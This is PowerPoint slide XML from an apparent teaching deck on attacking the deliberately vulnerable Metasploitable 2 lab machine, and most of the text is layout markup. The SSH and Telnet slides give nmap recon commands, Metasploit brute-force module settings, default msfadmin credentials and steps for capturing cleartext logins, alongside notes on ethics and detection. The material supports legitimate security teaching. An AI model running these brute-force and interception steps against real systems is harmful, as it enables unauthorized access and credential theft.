            <a:lvl3pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg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2799951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16E3F0B-343E-4C97-A8D6-C47FCC915F7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A02905C-2C7D-4445-B47F-3EBBA4465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17BC8A51-D50F-4F98-9402-8FF90BD2D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1D23A006-AC57-4A0B-BC20-6D226A80CC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8530514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F05564D-C546-470F-B93C-274AA86CE01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E102DC0-E499-4C34-9CD9-CDABF71081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70819" y="2355057"/>
            <a:ext cx="9250363" cy="2147887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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof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399162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F05564D-C546-470F-B93C-274AA86CE01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15E379-3C1C-4942-917E-02E25E8CB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52969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5453007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9E60A5F-CE74-4F00-A5C2-F9742DDFFF1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6047C4-77C4-4E19-8DD7-2ED3165B7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50B5CF-1C4F-4BA2-8E78-5F48C92A9D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4C6A0A-8A9D-47A1-97DA-BB4949151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31715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94591" y="1090118"/>
            <a:ext cx="4494133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94591" y="2243662"/>
            <a:ext cx="4473108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924675" y="1993043"/>
            <a:ext cx="5267325" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="3434400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6894591" y="2868443"/>
            <a:ext cx="4482996" cy="2432603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0861AA2-8248-462C-B6D8-FFD829F41ED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854411" y="1472184"/>
            <a:ext cx="3246204" cy="5385816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47638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Layout v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219359"/>
            <a:ext cx="5021940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3122284"/>
            <a:ext cx="3434400" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="3434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333600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4C9D5785-B116-4BE7-AC26-5CD6481FFA6A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392200"/>
            <a:ext cx="5009495" cy="2210173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3" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278C2B8F-0B29-449C-AFFD-42BB56FA159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108356" y="-20834"/>
            <a:ext cx="5245444" cy="5385816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103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s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00317" y="707529"/>
            <a:ext cx="4494133" cy="569086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400317" y="1625821"/>
            <a:ext cx="4473108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6430402" y="1375202"/>
            <a:ext cx="5761598" cy="100800"/>
            <a:chOff x="-322276" y="3240138"/>
            <a:chExt cx="3756676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-322276" y="3290538"/>
              <a:ext cx="3706276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2920469" y="3291840"/>
            <a:ext cx="2670048" cy="64008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EDA47E0-9B2C-45BF-A34A-E7069690AEF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090460" y="3273552"/>
            <a:ext cx="640080" cy="6583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831850" y="3291840"/>
            <a:ext cx="1209357" cy="64008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text styles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C7A796C4-1255-4B26-B034-EFB1284B77EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2920469" y="4427608"/>
            <a:ext cx="2670048" cy="64008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4" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F406E84-6EA1-4D34-8016-6A41F065FF7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090460" y="4409320"/>
            <a:ext cx="640080" cy="6583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7965133B-076D-4FAD-8D2A-C24FE2619C80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831850" y="4427608"/>
            <a:ext cx="1209357" cy="64008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text styles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CABE6307-1A20-419D-A352-17FF0286600B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549426" y="3291840"/>
            <a:ext cx="2670048" cy="64008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D2C5C227-18EE-4D6A-AA31-30B8F7CD20A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719417" y="3273552"/>
            <a:ext cx="640080" cy="6583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6ABEA821-83E0-4C10-98A8-5F29E246F74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6460807" y="3291840"/>
            <a:ext cx="1209357" cy="64008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text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CA1DC741-B44F-4275-A1D5-B8D26A3390B3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8549426" y="4427608"/>
            <a:ext cx="2670048" cy="640080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0" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C550F6C4-BE33-415F-B0BC-B47EDC1BDACB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7719417" y="4409320"/>
            <a:ext cx="640080" cy="65836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4C0830D2-D692-4161-8ECB-338703C94351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6460807" y="4427608"/>
            <a:ext cx="1209357" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns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text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331145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nitor and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3276" y="2091023"/>
            <a:ext cx="4464049" cy="804338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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26770" y="3244567"/>
            <a:ext cx="4443165" cy="569085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CF4ED1-C6C8-4C5C-8C14-4FF197588C03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192163" y="1435133"/>
            <a:ext cx="5175504" cy="4187952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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>
              <a:fillRect t="1504" b="1504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7317392-EF87-4050-8BBE-32F74B0CF15A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2993948"/>
            <a:ext cx="3434400" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="3434400" cy="1008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85A4134-866D-4143-AC1E-8A2FFDB49855}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3290538"/>
              <a:ext cx="338400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BBC5D9C-B8FB-455B-9398-36DB21F2765E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3333600" y="3240138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BB522941-5C7D-4701-9AD7-BB4C11C6EBCE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815720" y="3869349"/>
            <a:ext cx="4452987" cy="1328330"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns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Char char="o"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B8B3AB3-C02D-418C-A9E2-AA65DE78350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362829" y="1673942"/>
            <a:ext cx="4853962" cy="3141406"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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9886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093DA11F-BC94-447C-B660-9C906BED01B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1682496"/>
            <a:ext cx="12191999" cy="3493008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8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9F1B35C-893A-4033-ADC0-2192AFA2927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637DF8-B064-4F36-89F8-EBF538A2E7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63976" y="696584"/>
            <a:ext cx="4464049" cy="569086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>CLICK TO EDIT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72532A-5006-46B7-AE99-3A6891CD0254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884860" y="1983086"/>
            <a:ext cx="4443165" cy="569085"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" b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EFC6D7-3241-401C-A16A-4A7CC2653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45D6DC-ABA5-4D00-9CD3-92FFDD1FA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459C86-0106-40E0-AA18-795EC5787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D14F7B3-A6CF-491C-9855-75B5784CC45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72225750-E4CE-4A81-A0C3-4023030D637E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819C324-07DF-49DB-A08C-0E6155CE3041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75A34025-44F2-4A09-8629-F1794E9D35A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5854A2-EAE9-4B2A-84CF-5A4BD753863A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78842051-6173-4CC2-8C4A-8AE31FE7BA54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5124396" y="1373283"/>
            <a:ext cx="1943208" cy="100800"/>
            <a:chOff x="3149478" y="1373283"/>
            <a:chExt cx="1943208" cy="100800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B7317392-EF87-4050-8BBE-32F74B0CF15A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3149478" y="1373283"/>
              <a:ext cx="1943208" cy="100800"/>
              <a:chOff x="0" y="3237441"/>
              <a:chExt cx="1943208" cy="100800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785A4134-866D-4143-AC1E-8A2FFDB49855}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="3290538"/>
                <a:ext cx="1892808" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg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1BBC5D9C-B8FB-455B-9398-36DB21F2765E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1842408" y="3237441"/>
                <a:ext cx="100800" cy="100800"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                  <a:lumOff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noProof="0" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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D1C3636-C306-4492-8D46-194288459CAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3149478" y="1373283"/>
              <a:ext cx="100800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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3235028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E8E3FDB8-6D5C-48FE-99EA-7EC60F4D819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34000">
                <a:srgbClr val="0F1722"/>
              </a:gs>
              <a:gs pos="69000">
                <a:srgbClr val="0F1722"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent5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9775F3-A041-479A-8038-652B7D9C7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MM.DD.20XX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EDD04-BE4E-4B91-B13E-0C4FB3E1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DF5D8-12DC-494E-B0F1-2E9C86A1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noProof="0" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" noProof="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BF87C9E-53A2-4DE1-89DC-3907BE2E3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4263" y="707529"/>
            <a:ext cx="6310887" cy="569086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="3600"/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EB453F8F-AA02-4E0D-93BF-8CF4F1490377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104263" y="1625821"/>
            <a:ext cx="6289862" cy="569085"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B07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0" name="Picture Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A541F291-2E4B-474E-9ED0-55C97A2A066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859665"/>
            <a:ext cx="1078992" cy="548640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1200"/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E4D57E-4989-4939-A31F-637543FAB606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7179281" y="1375202"/>
            <a:ext cx="5012719" cy="100800"/>
            <a:chOff x="304632" y="3240138"/>
            <a:chExt cx="3129768" cy="1008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70B72A7-B625-48B8-88E6-BCE2A4DD531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04632" y="3290538"/>
              <a:ext cx="3079370" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg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ED729F-F8A5-4244-9776-4935C260F11F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3368676" y="3240138"/>
              <a:ext cx="65724" cy="100800"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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noProof="0" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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E12A846-0DFC-435B-BAE9-D90C353E0344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226927" y="4271296"/>
            <a:ext cx="2944368" cy="141982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150998C-CF95-4C6F-8962-8EB2DB30177D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F86A2ACD-8CF5-48A3-A678-E213A809B332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0811BB-0E37-4D70-84A5-97B3FBEDCBE6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03B3046-0457-4D23-8E0C-64E3FCD620BB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F2ACDD32-C1AB-4359-B055-2F910492987E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226927" y="3858610"/>
            <a:ext cx="2944368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D0092E26-7A96-4712-98A7-FFDA7C3D772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226927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1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B17B484C-F876-40B2-89DE-FC7A9E54C835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871314" y="4271296"/>
            <a:ext cx="2944368" cy="141982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7A54608E-523B-47AC-B8A6-3E8FE9A1584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871314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2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99E02476-A734-4A74-BC42-F104B37C8C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871314" y="3858610"/>
            <a:ext cx="2944368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E0D32F26-CEE2-4420-A43D-B008AE2D1DDC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8515702" y="4271296"/>
            <a:ext cx="2944368" cy="1419822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1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38" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC2890A-FFF7-4606-A262-6D464BA5D99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515702" y="2760518"/>
            <a:ext cx="978408" cy="978408"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="7000" b="1">
                <a:ln w="6350">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:noFill/>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>3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268E1254-8C59-4B9B-A775-45CA3D655514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515702" y="3858610"/>
            <a:ext cx="2944368" cy="328343"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="20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E47DC43-D8A0-4F17-B897-D8B07A6F1B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205335" y="3256107"/>
            <a:ext cx="266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201F265-08ED-497A-BE5C-62220829348F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5849839" y="3255785"/>
            <a:ext cx="2664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6344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67058B-89E0-4460-AB21-21747CB3A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1C5EB-04D6-4050-930C-5F6907528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2220F-109C-4A57-81E9-C6279EDA13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16836" y="5878720"/>
            <a:ext cx="1336964" cy="2988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0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noProof="0" dirty="0"/>
              <a:t>MM.DD.20XX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5404F-F26F-42E5-BA15-C0373FC1CF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69960" y="5878720"/>
            <a:ext cx="2915733" cy="298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bg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US" noProof="0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25174-FA04-488F-9F0C-3CD1D1483F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78643" y="5879656"/>
            <a:ext cx="354492" cy="2973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2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8D581BC7-E183-40DB-AC97-C19EA4EB8894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FEF1588-F385-48F3-800A-554A9423E77A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809310" y="5879656"/>
            <a:ext cx="283464" cy="283464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40B0943-F568-4674-8FA4-B435B1E466AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11580000" y="6020920"/>
            <a:ext cx="6120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62DE7FD5-7941-43A1-8663-42AE40546A4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11466563" y="5966056"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350"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7791EE5-EF06-4BF8-84C6-EC24114E73F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="6020920"/>
            <a:ext cx="803275" cy="468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1861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69" r:id="rId14"/>
    <p:sldLayoutId id="2147483670" r:id="rId15"/>
    <p:sldLayoutId id="2147483671" r:id="rId16"/>
    <p:sldLayoutId id="2147483672" r:id="rId17"/>
    <p:sldLayoutId id="2147483673" r:id="rId18"/>
    <p:sldLayoutId id="2147483674" r:id="rId19"/>
    <p:sldLayoutId id="2147483675" r:id="rId20"/>
    <p:sldLayoutId id="2147483676" r:id="rId21"/>
    <p:sldLayoutId id="2147483677" r:id="rId22"/>
    <p:sldLayoutId id="2147483678" r:id="rId23"/>
    <p:sldLayoutId id="2147483679" r:id="rId24"/>
    <p:sldLayoutId id="2147483680" r:id="rId25"/>
    <p:sldLayoutId id="2147483681" r:id="rId26"/>
    <p:sldLayoutId id="2147483682" r:id="rId27"/>
    <p:sldLayoutId id="2147483683" r:id="rId28"/>
    <p:sldLayoutId id="2147483684" r:id="rId29"/>
    <p:sldLayoutId id="2147483685" r:id="rId30"/>
    <p:sldLayoutId id="2147483686" r:id="rId31"/>
    <p:sldLayoutId id="2147483687" r:id="rId32"/>
    <p:sldLayoutId id="2147483690" r:id="rId33"/>
    <p:sldLayoutId id="2147483691" r:id="rId34"/>
    <p:sldLayoutId id="2147483688" r:id="rId35"/>
    <p:sldLayoutId id="2147483692" r:id="rId36"/>
    <p:sldLayoutId id="2147483689" r:id="rId3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527" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="7174" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="506" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3793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orient="horz" pos="2160" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="3318" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="436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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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F6FF42-70E3-4A7F-B5D8-2928FCB71A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METASPLOITABLE 2</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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40A11AA-C85D-4AF4-92B2-0F4E36F4EC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NANDHANA K S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4048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E676396-C21D-4B70-9D79-1F2D37C21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SSH  Port 22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76CF779-081B-4E72-A319-7C38F36AC3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3363" y="1514305"/>
            <a:ext cx="7096709" cy="978407"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypted protocol vs weak credentials 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59A383-0866-4407-8C26-55CD13DCF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t>10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63E0F1-B897-4223-A3A2-2C081255D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Metasploitable2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F6BAA2-E4F1-4057-8037-B984D995D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06-10-2025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CE54768B-43DD-4D9E-BE35-1671553E280D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4313363" y="2136753"/>
            <a:ext cx="6594782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Why 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highlights risk from weak credentials and old SSH configs despite encryption.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Recon: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nmap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-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Pn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-p 22 -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sV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&lt;TARGET_IP&gt; -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ssh-recon.txt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Brute-force (Metasploit):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use auxiliary/scanner/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ssh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/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ssh_login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set RHOSTS &lt;TARGET_IP&gt;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set USER_FILE /root/ssh_users.txt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set PASS_FILE /root/ssh_pass.txt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set THREADS 10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→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run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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o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CE3BD70F-DA4A-48A3-B1AA-6669906C4A55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4292016" y="3952635"/>
            <a:ext cx="6713508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Manual connect (after creds found):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</a:b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ssh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-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oHostKeyAlgorithms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=+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ssh-rsa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-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oPubkeyAcceptedKeyTypes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=+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ssh-rsa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msfadmin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@&lt;TARGET_IP&gt;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Teaching points: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Modern SSH clients may reject old host-key algorithms — labs may require forcing legacy flags.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Brute forcing is noisy and detectable; discuss IDS alerts, legality, and ethics.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Cleanup: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close SSH, kill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msf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sessions, revert snapshot.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E95CE40-E897-40F4-A875-FD2DB2606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967" y="0"/>
            <a:ext cx="3508726" cy="4124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431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23339"/>
            <a:ext cx="5021940" cy="804338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telnet  Port 23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture Placeholder 17" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9DAA9F-5926-4BC1-8F7B-06E0B1C2F013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397604" y="0"/>
            <a:ext cx="5245444" cy="5385816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5328BF-D489-4F39-BA27-5AD38E911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7B5262-30A5-4063-A21E-56FCACC40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Metasploitable2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F813B4-2C3F-45B0-A38D-A3FE79E6D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06-10-2025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54308A-8DFF-4A85-A1F8-220BD9F832B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778643" y="1432080"/>
            <a:ext cx="4379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Demonstrates how unencrypted protocols expose credentials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9C0D1CD-F78A-4342-8305-4C88192AA03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="778643" y="2078411"/>
            <a:ext cx="5559404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Why teach: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highlights danger of plaintext authentication and easy interception.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Recon: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nmap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-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Pn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-p 23 -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sV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&lt;TARGET_IP&gt; -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telnet-recon.txt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Brute-force (Metasploit):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use auxiliary/scanner/telnet/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telnet_login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set RHOSTS &lt;TARGET_IP&gt;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set USER_FILE /root/ssh_users.txt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set PASS_FILE /root/ssh_pass.txt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→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run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Verify interactively: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telnet &lt;TARGET_IP&gt; 23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→ login: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msfadmin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→ password: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msfadmin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Capture demo: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run Wireshark/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tshark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on attacker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iface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→ filter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tcp.port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== 23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(or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telnet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) →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Follow → TCP Stream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to show cleartext creds.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Teaching point / Analogy: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Telnet is like sending a postcard with your username/password written on it — anyone intercepting it can read it.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Security note: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Never use Telnet on open or untrusted networks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="982133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E676396-C21D-4B70-9D79-1F2D37C21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/ Apache Port 80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76CF779-081B-4E72-A319-7C38F36AC3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3363" y="1514305"/>
            <a:ext cx="7096709" cy="512245"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
